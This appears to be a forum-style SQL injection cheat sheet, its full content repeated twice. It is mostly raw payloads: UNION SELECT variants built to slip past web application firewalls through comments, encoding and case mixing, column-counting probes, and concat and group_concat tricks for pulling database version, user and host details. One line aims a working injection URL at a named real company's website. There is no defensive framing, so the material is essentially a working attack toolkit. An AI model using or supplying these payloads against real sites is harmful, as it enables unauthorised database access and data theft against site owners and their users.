- ) order by 1-- -
- ') order by 1-- -
- ')order by 1%23%23
- %')order by 1%23%23
- Null' order by 100--+
- Null' order by 9999--+
- ')group by 99-- -
- 'group by 119449-- -
- 'group/**/by/**/99%23%23
- union select ByPassing method
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- +/*!u%6eion*/+/*!se%6cect*/+
- /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
- 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- union /*!50000%53elect*/
- %55nion %53elect
- +--+Union+--+Select+--+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- UnIoN SeLeCt CoNcAt(version())--
- uNiOn aLl sElEcT
- uUNIONnion all sSELECTelect
- ============================================================================
- :: 400 Bad Request ::
- ============================================================================
- –+%0A
- union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
- ===========================================================================
- null the parameter
- ===========================================================================
- id=-1
- id=null
- id=1+and+false+
- id=9999
- id=1 and 0
- id==1
- id=(-1)
- ==========================================================================
- Group_Concat
- ==========================================================================
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- ==========================================================================
- To make the column number appear in the page, put this after id
- ==========================================================================
- id=1+and+1=0+union+select+1,2,3,4,5,6
- +AND+1=0
- /*!aND*/ 1 like 0
- +/*!and*/+1=0
- +and+2>3+
- +and(1)=(0)
- and (1)!=(0)
- +div+0
- Having+1=0
- ==========================================================================
- function ByPassing
- ==========================================================================
- unhex(hex(value))
- cast(value as char)
- uncompress(compress(version()))
- cast(version() as char)
- aes_decrypt(aes_encrypt(version(),1),1)
- binary(version())
- convert(value using ascii)
- ===========================================================================
- avoid source page injection
- ===========================================================================
- FullSecurity.org
- concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
- “><br>? <img src=”
- <img src=””/>injection<img src=”
- concat(0x223e,@@version)
- concat(0x273e27,version(),0x3c212d2d)
- concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
- concat(0x223e,@@version,0x3c696d67207372633d22)
- concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
- concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
- concat(‘</title>’,@@version,’<title>’)
- concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
- concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
- ============================================================================
- get version – DB_NAME – user – HOST_NAME – datadir
- ============================================================================
- FullSecurity.org
- version()
- convert(version() using latin1)
- unhex(hex(version()))
- @@GLOBAL.VERSION
- (substr(@@version,1,1)=5) :: 1 true, 0 false
- # like #
- http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
- ===========================================================================
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- id=1 /*!40123 1=1*/–+- no error
- id=1 /*!40122rrrr*/ no error
- FullSecurity.org
- ) order by 1-- -
- ') order by 1-- -
- ')order by 1%23%23
- %')order by 1%23%23
- Null' order by 100--+
- Null' order by 9999--+
- ')group by 99-- -
- 'group by 119449-- -
- 'group/**/by/**/99%23%23
- union select ByPassing method
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
- +/*!u%6eion*/+/*!se%6cect*/+
- /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
- 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
- /*!50000%55nIoN*/+/*!50000%53eLeCt*/
- union /*!50000%53elect*/
- %55nion %53elect
- +--+Union+--+Select+--+
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- UnIoN SeLeCt CoNcAt(version())--
- uNiOn aLl sElEcT
- uUNIONnion all sSELECTelect
- ============================================================================
- :: 400 Bad Request ::
- ============================================================================
- –+%0A
- union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
- ===========================================================================
- null the parameter
- ===========================================================================
- id=-1
- id=null
- id=1+and+false+
- id=9999
- id=1 and 0
- id==1
- id=(-1)
- ==========================================================================
- Group_Concat
- ==========================================================================
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- ==========================================================================
- To make the column number appear in the page, put this after id
- ==========================================================================
- id=1+and+1=0+union+select+1,2,3,4,5,6
- +AND+1=0
- /*!aND*/ 1 like 0
- +/*!and*/+1=0
- +and+2>3+
- +and(1)=(0)
- and (1)!=(0)
- +div+0
- Having+1=0
- ==========================================================================
- function ByPassing
- ==========================================================================
- unhex(hex(value))
- cast(value as char)
- uncompress(compress(version()))
- cast(version() as char)
- aes_decrypt(aes_encrypt(version(),1),1)
- binary(version())
- convert(value using ascii)
- ===========================================================================
- avoid source page injection
- ===========================================================================
- FullSecurity.org
- concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
- “><br>? <img src=”
- <img src=””/>injection<img src=”
- concat(0x223e,@@version)
- concat(0x273e27,version(),0x3c212d2d)
- concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
- concat(0x223e,@@version,0x3c696d67207372633d22)
- concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
- concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
- concat(‘</title>’,@@version,’<title>’)
- concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
- concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
- ============================================================================
- get version – DB_NAME – user – HOST_NAME – datadir
- ============================================================================
- FullSecurity.org
- version()
- convert(version() using latin1)
- unhex(hex(version()))
- @@GLOBAL.VERSION
- (substr(@@version,1,1)=5) :: 1 true, 0 false
- # like #
- http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
- ===========================================================================
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- id=1 /*!40123 1=1*/–+- no error
- id=1 /*!40122rrrr*/ no error
- FullSecurity.org